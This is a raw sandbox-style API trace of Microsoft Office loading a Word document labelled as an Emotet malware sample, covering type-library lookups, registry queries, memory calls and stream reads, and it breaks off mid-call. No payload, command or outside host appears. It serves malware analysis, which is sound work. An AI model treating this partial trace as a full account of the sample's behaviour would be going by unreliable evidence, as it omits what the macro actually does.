lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x94 [0067.717] IMalloc:Alloc (This=0x7fefec05380, cb=0x12a) returned 0x68898e0 [0067.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=149, lpMultiByteStr=0x68898e0, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 149 [0067.717] IMalloc:Free (This=0x7fefec05380, pv=0x68898e0) [0067.717] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf1a8e0, cb=0xc00) returned 0xaf2dc70 [0067.717] wcscpy_s (in: _Destination=0xaf2e190, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0067.717] wcsncpy_s (in: _Destination=0x1462e0, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0067.717] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x94 [0067.717] IMalloc:Alloc (This=0x7fefec05380, cb=0x12a) returned 0x68898e0 [0067.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=149, lpMultiByteStr=0x68898e0, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 149 [0067.717] IMalloc:Free (This=0x7fefec05380, pv=0x68898e0) [0067.717] wcsncpy_s (in: _Destination=0x1462a0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0067.717] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchLength=0x7e | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x7e [0067.717] IMalloc:Alloc (This=0x7fefec05380, cb=0xfe) returned 0x6603960 [0067.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchWideChar=127, lpMultiByteStr=0x6603960, cbMultiByte=254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpUsedDefaultChar=0x0) returned 127 [0067.717] IMalloc:Free (This=0x7fefec05380, pv=0x6603960) [0067.717] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0 [0067.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x146580, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0067.718] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0067.718] strcpy_s (in: _Dst=0x146360, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0067.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x146360, cbMultiByte=7, lpWideCharStr=0x1461b0, cchWideChar=7 | out: lpWideCharStr="Office") returned 7 [0067.718] IUnknown:AddRef (This=0x665ba50) returned 0x3 [0067.718] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="Office", lHashVal=0x107515, pfName=0x146280, pBstrLibName=0x1461b0 | out: pfName=0x146280*=0, pBstrLibName=0x1461b0) returned 0x0 [0067.718] IUnknown:Release (This=0x665ba50) returned 0x2 [0067.718] IUnknown:AddRef (This=0x631b4c0) returned 0x3 [0067.718] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="Office", lHashVal=0x107515, pfName=0x146280, pBstrLibName=0x1461b0 | out: pfName=0x146280*=0, pBstrLibName=0x1461b0) returned 0x0 [0067.718] IUnknown:Release (This=0x631b4c0) returned 0x2 [0067.718] IUnknown:AddRef (This=0x665bd20) returned 0x4 [0067.718] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="Office", lHashVal=0x107515, pfName=0x146280, pBstrLibName=0x1461b0 | out: pfName=0x146280*=0, pBstrLibName=0x1461b0) returned 0x0 [0067.718] IUnknown:Release (This=0x665bd20) returned 0x3 [0067.718] IMalloc:Alloc (This=0x7fefec05380, cb=0x208) returned 0x64fcbb0 [0067.718] wcscpy_s (in: _Destination=0x429ce88, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0067.718] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x145960 | out: phkResult=0x145960*=0xa1e) returned 0x0 [0067.719] RegOpenKeyW (in: hKey=0xa1e, lpSubKey="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", phkResult=0x145958 | out: phkResult=0x145958*=0xabe) returned 0x0 [0067.719] RegEnumKeyW (in: hKey=0xabe, dwIndex=0x0, lpName=0x145988, cchName=0xa | out: lpName="2.6") returned 0x0 [0067.719] RegEnumKeyW (in: hKey=0xabe, dwIndex=0x1, lpName=0x145988, cchName=0xa | out: lpName="2.7") returned 0x0 [0067.720] RegEnumKeyW (in: hKey=0xabe, dwIndex=0x2, lpName=0x145988, cchName=0xa | out: lpName="2.8") returned 0x0 [0067.720] wcscpy_s (in: _Destination=0x145970, _SizeInWords=0xa, _Source="2.8" | out: _Destination="2.8") returned 0x0 [0067.720] RegOpenKeyW (in: hKey=0xabe, lpSubKey="2.8", phkResult=0x145a18 | out: phkResult=0x145a18*=0xb5a) returned 0x0 [0067.720] _ultoa_s (in: _Val=0x0, _DstBuf=0x145990, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0067.720] RegOpenKeyA (in: hKey=0xb5a, lpSubKey="0", phkResult=0x145980 | out: phkResult=0x145980*=0xb5e) returned 0x0 [0067.721] RegOpenKeyW (in: hKey=0xb5e, lpSubKey="win64", phkResult=0x145988 | out: phkResult=0x145988*=0x92e) returned 0x0 [0067.721] RegCloseKey (hKey=0x92e) returned 0x0 [0067.721] RegCloseKey (hKey=0xb5e) returned 0x0 [0067.721] _ultow_s (in: _Value=0x0, _Buffer=0x145a20, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0067.721] RegOpenKeyW (in: hKey=0xb5a, lpSubKey="0", phkResult=0x1459f8 | out: phkResult=0x1459f8*=0x926) returned 0x0 [0067.722] RegQueryValueW (in: hKey=0x926, lpSubKey="win64", lpData=0x145a40, lpcbData=0x1459f4 | out: lpData="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpcbData=0x1459f4) returned 0x0 [0067.723] wcscpy_s (in: _Destination=0x64fcbb0, _SizeInWords=0x104, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0067.723] RegCloseKey (hKey=0x926) returned 0x0 [0067.723] RegCloseKey (hKey=0xb5a) returned 0x0 [0067.723] RegCloseKey (hKey=0xabe) returned 0x0 [0067.723] RegCloseKey (hKey=0xa1e) returned 0x0 [0067.723] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x146068*=0x0 | out: pptlib=0x146068*=0x665b4b0) returned 0x0 [0067.761] IMalloc:Free (This=0x7fefec05380, pv=0x64fcbb0) [0067.761] IUnknown:AddRef (This=0x665b4b0) returned 0x2 [0067.762] IUnknown:QueryInterface (in: This=0x665b4b0, riid=0x7fee3b285a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1460c8 | out: ppvObject=0x1460c8*=0x0) returned 0x80004002 [0067.762] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="Office", lHashVal=0x107515, pfName=0x146280, pBstrLibName=0x1461b0 | out: pfName=0x146280*=0, pBstrLibName=0x1461b0) returned 0x0 [0067.762] IUnknown:Release (This=0x665b4b0) returned 0x1 [0067.762] IMalloc:Alloc (This=0x7fefec05380, cb=0x3c) returned 0x68def50 [0067.762] IMalloc:Free (This=0x7fefec05380, pv=0x694f150) [0067.762] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e2e0 [0067.762] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e2e0, cb=0x68) returned 0x694f150 [0067.762] IMalloc:Free (This=0x7fefec05380, pv=0x68def50) [0067.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cU1A41_", cchWideChar=8, lpMultiByteStr=0x1463c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cU1A41_", lpUsedDefaultChar=0x0) returned 8 [0067.763] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cU1A41_") returned 0x1062dc [0067.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cU1A41_", cchWideChar=8, lpMultiByteStr=0x146500, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cU1A41_", lpUsedDefaultChar=0x0) returned 8 [0067.763] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cU1A41_") returned 0x1062dc [0067.763] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a58f30, cb=0x8) returned 0x6a59870 [0067.763] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf607c0 [0067.763] IMalloc:GetSize (This=0x7fefec05380, pv=0xaf607c0) returned 0x80 [0067.763] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf02bd0 [0067.763] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf02c90 [0067.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cU1A41_", cchWideChar=8, lpMultiByteStr=0x1463c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cU1A41_", lpUsedDefaultChar=0x0) returned 8 [0067.763] CoCreateGuid (in: pguid=0x1460f0 | out: pguid=0x1460f0*(Data1=0xad845395, Data2=0x2461, Data3=0x4fa6, Data4=([0]=0xa2, [1]=0x49, [2]=0x27, [3]=0xe2, [4]=0x76, [5]=0x41, [6]=0xc5, [7]=0xe))) returned 0x0 [0067.763] CoCreateGuid (in: pguid=0x146100 | out: pguid=0x146100*(Data1=0x3eeedd65, Data2=0x7e83, Data3=0x4d09, Data4=([0]=0x85, [1]=0x37, [2]=0xc2, [3]=0x9d, [4]=0x73, [5]=0x3, [6]=0x77, [7]=0xee))) returned 0x0 [0067.763] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="cU1A41_", cchWideChar=8, lpMultiByteStr=0x146110, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cU1A41_", lpUsedDefaultChar=0x0) returned 8 [0067.763] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cU1A41_") returned 0x1062dc [0067.763] GetLocalTime (in: lpSystemTime=0x145fe8 | out: lpSystemTime=0x145fe8*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x4, wMilliseconds=0x3b0)) [0067.763] _ultow_s (in: _Value=0x5e95ca90, _Buffer=0xaf2bafc, _BufferCount=0x9, _Radix=16 | out: _Buffer="5e95ca90") returned 0x0 [0067.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="015e95ca90", cchWideChar=11, lpMultiByteStr=0x145f80, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="015e95ca90", lpUsedDefaultChar=0x0) returned 11 [0067.764] IMalloc:Alloc (This=0x7fefec05380, cb=0x170) returned 0xafa3770 [0067.764] IMalloc:Alloc (This=0x7fefec05380, cb=0x50) returned 0x680a280 [0067.764] strcpy_s (in: _Dst=0x6a16c78, _DstSize=0x8, _Src="cU1A41_" | out: _Dst="cU1A41_") returned 0x0 [0067.764] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a58e30, cb=0x68) returned 0x694fee0 [0067.764] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cU1A41_") returned 0x1062dc [0067.764] wcscpy_s (in: _Destination=0xaf2bb10, _SizeInWords=0x8, _Source="cU1A41_" | out: _Destination="cU1A41_") returned 0x0 [0067.765] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cU1A41_") returned 0x1062dc [0067.765] wcscpy_s (in: _Destination=0xaf2bb20, _SizeInWords=0x8, _Source="cU1A41_" | out: _Destination="cU1A41_") returned 0x0 [0067.765] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a58e60, cb=0x12) returned 0x258d760 [0067.765] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a58da0, cb=0x6) returned 0x6a58e60 [0067.765] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cU1A41_") returned 0x1062dc [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x48) returned 0x68def50 [0067.765] IMalloc:Free (This=0x7fefec05380, pv=0x694f150) [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e2e0 [0067.765] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e2e0, cb=0x74) returned 0x6a5f190 [0067.765] IMalloc:Free (This=0x7fefec05380, pv=0x68def50) [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x3d0) returned 0xafa5740 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e2e0 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x258d6c0 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60850 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a58da0 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a58e30 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x688) returned 0xaf3d6c0 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf608e0 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x640) returned 0xaf3dd50 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e2b0 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a58f30 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a59880 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e280 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60970 [0067.765] IMalloc:Alloc (This=0x7fefec05380, cb=0x400) returned 0xafa5b50 [0067.766] IMalloc:Alloc (This=0x7fefec05380, cb=0x400) returned 0xafa5f60 [0067.766] IMalloc:Alloc (This=0x7fefec05380, cb=0x400) returned 0xafa6370 [0067.766] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0067.766] strcpy_s (in: _Dst=0x146150, _DstSize=0xa, _Src="_Evaluate" | out: _Dst="_Evaluate") returned 0x0 [0067.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x146150, cbMultiByte=10, lpWideCharStr=0x145fa0, cchWideChar=10 | out: lpWideCharStr="_Evaluate") returned 10 [0067.766] IUnknown:AddRef (This=0x665ba50) returned 0x3 [0067.766] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x146070, pBstrLibName=0x145fa0 | out: pfName=0x146070*=0, pBstrLibName=0x145fa0) returned 0x0 [0067.766] IUnknown:Release (This=0x665ba50) returned 0x2 [0067.766] IUnknown:AddRef (This=0x631b4c0) returned 0x3 [0067.766] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x146070, pBstrLibName=0x145fa0 | out: pfName=0x146070*=0, pBstrLibName=0x145fa0) returned 0x0 [0067.766] IUnknown:Release (This=0x631b4c0) returned 0x2 [0067.766] IUnknown:AddRef (This=0x665bd20) returned 0x4 [0067.766] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x146070, pBstrLibName=0x145fa0 | out: pfName=0x146070*=0, pBstrLibName=0x145fa0) returned 0x0 [0067.766] IUnknown:Release (This=0x665bd20) returned 0x3 [0067.766] IUnknown:AddRef (This=0x665b4b0) returned 0x2 [0067.766] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x146070, pBstrLibName=0x145fa0 | out: pfName=0x146070*=1, pBstrLibName=0x145fa0) returned 0x0 [0067.766] IUnknown:Release (This=0x665b4b0) returned 0x1 [0067.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_Evaluate", cchWideChar=-1, lpMultiByteStr=0x146150, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_Evaluate", lpUsedDefaultChar=0x0) returned 10 [0067.766] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0067.767] wcsncpy_s (in: _Destination=0x146160, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0067.767] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchLength=0x7e | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x7e [0067.767] IMalloc:Alloc (This=0x7fefec05380, cb=0xfe) returned 0xaf54180 [0067.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchWideChar=127, lpMultiByteStr=0xaf54180, cbMultiByte=254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpUsedDefaultChar=0x0) returned 127 [0067.767] IMalloc:Free (This=0x7fefec05380, pv=0xaf54180) [0067.767] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0 [0067.767] CExposedDocFile::AddRef () returned 0x3 [0067.767] CExposedDocFile::AddRef () returned 0x4 [0067.767] CExposedDocFile::OpenStream () returned 0x0 [0067.767] CExposedDocFile::Release () returned 0x3 [0067.767] CExposedStream::Seek () returned 0x0 [0067.767] CExposedStream::AddRef () returned 0x2 [0067.767] CExposedStream::Read () returned 0x0 [0067.767] IMalloc:Alloc (This=0x7fefec05380, cb=0x2028) returned 0x4145170 [0067.767] IMalloc:Alloc (This=0x7fefec05380, cb=0x10020*=0x10128) returned 0xafadb20 [0067.768] CExposedStream::AddRef () returned 0x3 [0067.768] CExposedStream::Release () returned 0x2 [0067.768] IMalloc:Alloc (This=0x7fefec05380, cb=0x2ee0) returned 0xafbdb50 [0067.768] IMalloc:Alloc (This=0x7fefec05380, cb=0x800) returned 0x62b9910 [0067.768] CExposedStream::Read () returned 0x0 [0067.768] CExposedStream::Read () returned 0x0 [0067.768] IMalloc:Alloc (This=0x7fefec05380, cb=0x404) returned 0xafa6780 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x80", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x81", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x82", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x83", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x84", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x85", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x86", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x87", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x88", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x89", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8a", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8b", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8c", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8d", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8e", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8f", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x90", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x91", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.769] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x92", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x93", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x94", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x95", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x96", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x97", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x98", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x99", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9a", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9b", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9c", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9d", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9e", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9f", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: 